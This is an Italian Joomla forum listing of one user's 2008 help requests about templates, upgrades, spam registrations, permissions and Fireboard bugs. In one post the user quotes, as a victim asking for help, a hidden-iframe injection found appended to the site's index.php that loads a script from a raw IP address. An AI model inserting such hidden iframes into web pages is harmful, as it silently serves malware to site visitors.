Visualizza post

Questa sezione ti permette di visualizzare tutti i post inviati da questo utente. N.B: puoi vedere solo i post relativi alle aree dove hai l'accesso.


Topics - tavolez

Pagine: [1] 2 3
1
Salve a tutti,

Dopo 2 giorni di ricerche, senza ottenere buoni risultati, sono qui per chiedere aiuto alla community di joomla.it.

Ho appena installato sul mio sito il modulo "AutoTemplateSwitcher" che mi permette di assegnare uno specifico template, a seconda del browser che apre il mio sito.
In particolare ho impostato un template specifico per chi accede tramite iphone.

Volevo sapere se conoscete qualche template, possibilmente gratuito, che permetta una buona visualizzazione del sito da dispositivi mobile (cellulari tipo iphone o nokia N95 ecc.).

Non sono ancora riuscito a trovare nessun template, ma sono certo che ci siano...

Vi ringrazio per l'aiuto...

2
Salve a tutti,

Dopo 2 giorni di ricerche, senza ottenere buoni risultati, sono qui per chiedere aiuto alla community di joomla.it.

Ho appena installato sul mio sito il modulo "AutoTemplateSwitcher" che mi permette di assegnare uno specifico template, a seconda del browser che apre il mio sito.
In particolare ho impostato un template specifico per chi accede tramite iphone.

Volevo sapere se conoscete qualche template, possibilmente gratuito, che permetta una buona visualizzazione del sito da dispositivi mobile (cellulari tipo iphone o nokia N95 ecc.).

Non sono ancora riuscito a trovare nessun template, ma sono certo che ci siano...

Vi ringrazio per l'aiuto...

3
Joomla! 1.5 / Passaggio da Joomla 1.0.8 a 1.5.8.....
« il: 04 Dic 2008, 10:57:01 »
Ciao a tutti,

Io vorrei sapere se ci sono dei vantaggi nel passare
dalla versione 1.0.15b alla 1.5.8.

C'è qualche implementazione/vantaggio/sicurezza in più?
tenete conto che non ho assolutamente idea di cosa implementi in più Joomla dalla 1.5 in poi......

Grazie mille :)

4
Ciao a tutti,

Io vorrei sapere se ci sonod ei vantaggi nel passare
dalla versione 1.0.15b alla 1.5.8.

C'è qualche implementazione/vantaggio/sicurezza in più?
tenete conto che non ho assolutamente idea di cosa implementi in più Joomla dalla 1.5 in poi......

Ultima cosa: è possibile un passaggio dalla versione 1.0.15b alla 1.5.8? Se si è molto incasinato o si riesce a fare una cosa abbastanza indolore?

Grazie mille :)

5
Salve a tutti :)

Da un po' di tempo ho questo problema con il mio sito Joomla ( versione 1.0.8 ):

Ci sono degli utenti, presumibilmente bot, che si registrano a ripetizione al mio sito, sono circa 10 al giorno, ogni giorno.
Si iscrivono con delle mail tipo: @mail.ru, @gmail.com ecc ecc...

Non confermano neanche la registrazione clikkando sul link dell' e-mail che gli dovrebbe arrivare, quindi io nel pannello utenti li vedo come users registrati ma NON ABILITATI.

Il risultato è che ogni giorno, a fine giornata, sono costretto a cancellare i loro account, altrimenti mi ritroverei fra qualche settimana, un sito con 10.000 utenti....

Come posso risolvere? So che dovrei aggiornare Joomla, ma essendo una versione molto vecchia ho paura di combinare dei casini o dover rifare il sito :(

6
Salve a tutti,

Io ho il seguente problema con Joomla 1.5.8 (ma lo avevo anche con 1.5.7 prima di fare upgrade).

Quando provo ad andare in Gestione Media nel backend del sito e provo a caricare un'immagine, la schermata mi fa uno scherzetto e mi dice che mi devo LOGGARE come admin.
Io lo faccio e la pagina si refresha ma senza uploadare l'immagine... Vi allego uo screenshot:



Il risultato è che mi si crea una pagina dentro la pagina, uguale a quella di prima ma incorniciata nella finestra dei media...... In poche parole per me  è impossibile fare l'upload di immagini sul mio sito eheheh  :( :( :(

7
Ciao a tutti,

Sono mesi che ogni tanto questa cosa mi ritorna in mente, ma non riesco mai a risolverla.

Sto cercando un componente per messaggistica privata, magari che sia anche integrabile con Fireboard.

Sapete cosa posso utilizzare? Grazie :)

8
Joomla! 1.5 / Sito Joomla dentro a sito Joomla
« il: 12 Nov 2008, 16:43:02 »
E' possibile?

Io ho un sito in jooma del tipo: w*w.ciao.it
Posso creare una cartella di nome new e installare Joomla anche su: w*w.ciao.it/new e metterci su un altro sito Joomla?

Grazie :)


9
So che si tratti di un'impresa possibile, ma visto che hod el tempo da perdere volevo provare a vedere che esplode tutto eheheheh.

Ho un sito con Joomla 1.0.8, ora vedo che l'ultima versione è la 1.5.8 (sono passati un po' di anni eh?).

Che dite mi rassegno ancora prima di cominciare? :D

10
Joomla! 1.5 / Modulo traduzione italiano-inglese
« il: 10 Nov 2008, 12:05:25 »
Salve a tutti,

Ho appena installato Joomla 1.5 e avrei bisogno di un modulo da pubblicare in hompegae, che serva per fare la traduzione del sito dall' italiano all' inglese (possibilmente anche tedesco/francese/spagnolo ecc).

Ho provato Google Translator e devo dire che mi trovo molto bene.
Però, per esigenze aziendali, avrei bisogno che non si vedesse che è il traduttore di Google (cosa impossibile visto che il modulo pubblicato ha la bella immaginetta di Google, inoltre quando fa la traduzione si vede benissimo che è il traduttore di Google).

Esiste qualche componente/modulo di Joomla alternativo che mi piazza la classica BANDIERINA inglese/spagnolo ecc in HOMEPAGE dove clicko la bandierina e seleziono la lingua in cui voglio che mi traduca il sito?

Grazie mille per l'aiuto :)

11
Vi spiego brevemente il mio problema:

Ho creato diversi forum e sotto-forum.

Ho dato ad alcuni di questi la proprietà di essere visualizzati solo dagli utenti classificati come "Author".
Il tutto a funzionato perfettamente per 1 anno, chi avva livello di accesso più basso non poteva leggere i forum, chi lo aveva più alto invece si.

Poi mi sono accorto di una cosa per caso: un amico che avevo classificato come "Author" non lavora più con me, allora lo ho abbassato di livello a "Registered".....
Ma lui può visionare lostesso i forum come se fosse "Author"!!!!

Ma come diavolo è possibile? Questa è una grossa falla di sicurezza....Porca miseria....
Come faccio? Sono io che sbaglio qualcosa?

E' come se FIREBOARD tenesse memorizzato il livello di accesso più alto che un utente abbia mai avuto sul forum....

Spero di aver descritto bene il problema.. :(

12
Salve ragazzi,

E' da qualche tempo che accedendo al mio sito Joomla con alcuni browser (Firefox e Chorme), mi viene data la segnalazione di SITO PERICOLOSO per il mio pc (MALWARE), a causa di un link presente alla mia pagina contente l'IP: 81.2.197.14

Ho cercato su google ma non ho trovato nulla.

Poi oggi mi rendo conto che nel file index.php qualche male intenzionato deve avere aggiunto una stringa finale che vi riporto qui:

doGzip();
?><!-- ~ --><div style="visibility:hidden"><iframe src="http://81.2.197.14/pls/pls2/count.php?o=2" width=100 height=80></iframe></div><!-- ~ -->

Ora la ho cancellata, e sembra essere tornato tutto a posto (nessun browser mi dice che il mio sito contiene MALWARE).

Come diavolo è possibile che qualcuno sia riuscito a fare questo?
Premetto che per pigrizia e COLPA mia, ho una versione di Joomla vecchia di almeno 2 anni (1.0.8 stable ita) quindi sicuramente so che è meglio avere versioni aggiornate...

Però mi sembra assurdo che qualcuno possa entrare e modificare la mia index.php....

Qualcuno potrebbe per piacere illuminarmi sulla questione e su come funzionano queste cose?

Grazie :)

13
Salve a tutti, premetto che non mi intendo tanto di come funziona Google ed il ranking dei siti internet ecc...

Pero' pare che con Joomla ci sia il seguente problema:

Quando provo a cercare il mio sito con Google, il motore di ricerca vede la mia HOMEPAGE come duplicata.
In altre parole nei risultati di Google la mia pagina appare 47 volte....
Il motivo di questa cosa è che ci sono molti contenuti pubblicati in HOMEPAGE (il sito è già online da 2 anni, quindi ci sono molte NOTIZIE pubblicate per un totale di 47 pagine di notizie).

Quindi il problema risale nel fatto che Google vede come se io avessi 47 HOMEPAGE, mentre io invece ho 47 pagine di notizie....

Qualcuno ha idea di come potrei risolvere questo problema?

Vi prego datemi una mano, devo assolutamente risolverlo o rischio di perdere un contratto importante :(

14
Salve a tutti,

Io ho un grosso problema con Joomla.

Riguara i premessi che posso concedere agli utenti registrati al mio sito.
So per certo che appena un utente si registra avrà i premessi assegnati al gruppo REGISTERED.

Poi ci sono il gruppo AUTHOR, il gruppo EDITOR e PUBLISHER.

Io avrei bisogno di dare a un amico ad esempio il permesso EDITOR (perchè su Fireboard ho creato un form privato dove voglio che leggiamo solo io e lui).
Pero'se gli do il permesso EDITOR, lui ha ovviamente anche la possibilità di MODIFICARE LE NEWS sulla homepage!

Io vorrei evitare questa cosa, in poche parole vorrei che i permessi che io do' ai vari utenti su Fireboard, non incidano sui permessi del Public Frontend di Joomla di cui vi lascio una diapositiva:



E' possibile fare tale cosa?

Grazie mille per l'aiuto :)



15
Gestione Forum / Firemessage... Uscirà o no? :O
« il: 23 Mar 2008, 02:42:06 »
Doveva uscire a Febbraio ma non si hanno piu' notizie da mesi...

Qualcuno ha notizie su questo componente per messaggi privati per Fireboard?

16
Il titolo è un po' ambiguo, quindic ercherò di spiegarmi meglioc he posso.

Nel mio sito avrei l'esigenza di capire come poter visualizzare i vari MODULI che ho in homepage, anche su certi componenti.

In altre parole la situazione è questa:

Quando utilizzo alcuni componenti, come ad esempio quello per la registrazione di un nuovo utente, clikko  su REGISTER, e il componente mi manda su una pagina nuova che è molto "scarna".
Questo è dovuto al fatto che, la pagina a cui vengo mandato, utilizza come sfondo il mio template, ma non fa visualizzare i vari moduli che ho nel mio sito (com ad esempio colonna di sinistra, banner ecc.).

Io invece vorrei che il componente per la REGISTRAZIONE di un NUOVO UTENTE, mi mandasse ad una pagina personalizzabile, o comunque nella quale io possa visualizzare i vari moduli che voglio metterci.

Spero di essermi spiegato bene.

Grazie

17
Salve a tutti,

Volevo sottoporvi il mio "singolare" problema:

Il mio sito funziona da parecchio tempo, non mi ha mai dato particolari problemi.
Gli utenti si sono sempre registrati, gli arrivava la mial di conferma, e si auto-attivavano l'account.

Da qualche tempo però, le cose sono cambiate, la mail di conferma registazione non arriva più a nessuno, e io non ho toccato nulla nelle impostazioni.

Ho solo fatto un po' di casino installando qualche componente/mambot/modulo, ad esempio una volta avevo messo il forum SMF con il modulo SMF Login, ma poi ho disinstallato tutto.
Un'altra volta avevo installato il mambot registration_block, ma poi l'ho disinstallato..

Non dovrei aver combinato particolari casini, eppure le e-mail di registrazione non arrivano piu' :(

Qualcuno sa darmi qualche consiglio?

PS:  Ho sempre utilizzato il PHP Mail function, non credo sia quello il problema.

Ringrazio anticipatamente, vi prego aiutatemi :(

18
Salve a tutti, ho da poco installato Fireboard 1.04 nel mio sito, ho avuto qualche problemuccio iniziale, ma ora con la patch rilasciata su questo forum ho risolto quasi tutto e mi trovo alla grande! :)

Unico problema: non si possono inviare messaggi privati agli utenti, ho visto che esistono alcuni componenti per abilitare tale opzione, ma non mi sono fidato perchè ho visto che sono vecchi, oppure causano problemi di "sicurezza".

Mi chiedevo se coosceste qualche componente per i messaggi privati, facile da usare e che si integri bene con Fireboard.

Grazie mille per l'aiuto :)

19
A quanto sono riuscito a capire è un problema che hanno in molti....

In poche parole con questo Fireboard 1.0.4 c'è il seguente problema:

- Quando si clikka su QUOTE e si fa quindi una citazione, essa non rimane in un riquadro di colore diverso, bensì viene scritto normale come se nulla fosse....

Per spiegarmi meglio, se voglio citare un tizio che ha scritto: "ciaociao", invece di ottenere la scritta "ciaociao" in un riquadro di colore diverso, ottengo questa scritta:

QUOTE: ciaociao

Mi sembra chiaro che ci deve essere qualcosa nel codice originale che non funziona.... Su un forum tedesco ho visto che hanno risolto, ma ci si capisce poco in tedesco....Ho fatto delle prove ma nulla...
Qualcuno sa aiutarmi?

Grazie

20
Salve ragazzi,

ho un problema che mi affligge da diverso tempo.

Quando cestino un' immagine tramite GESTIONE MEDIA di Joomla, l'immagine viene eliminata (almeno apparentemente).

Il problema è che quando provo a caricare un'altra immagine (diversa dalla prima) ma con lo stesso nome, questa non viene caricata, bensì viene DI NUOVO caricata la precedente immagine che avevo cestinato!!!

So che è un ragionamento un po' contorto, spero di avervi spiegato bene il problema  ;D

Questa cosa non da' neanche tanto fastidio, basta uploadare sempre immagini con un nome diverso... Pero' mi da conflitti con alcuni componenti, ad esempio FIREBOARD.
Infatti in FIREBOARD quando un povero utente inserisce il suo AVATAR nel forum, esso viene salvato in una cartella di GESTIONE MEDIA di Joomla.
Di conseguenza se questo utente decide di cambiare AVATAR, puo' farlo quante volte gli pare, ma non riuscira' mai a cambiarlo poichè il file si chiama con lo stesso nome!!! :(

Grazie per l'aiuto :)
Quindi se

Pagine: [1] 2 3
Host

Torna su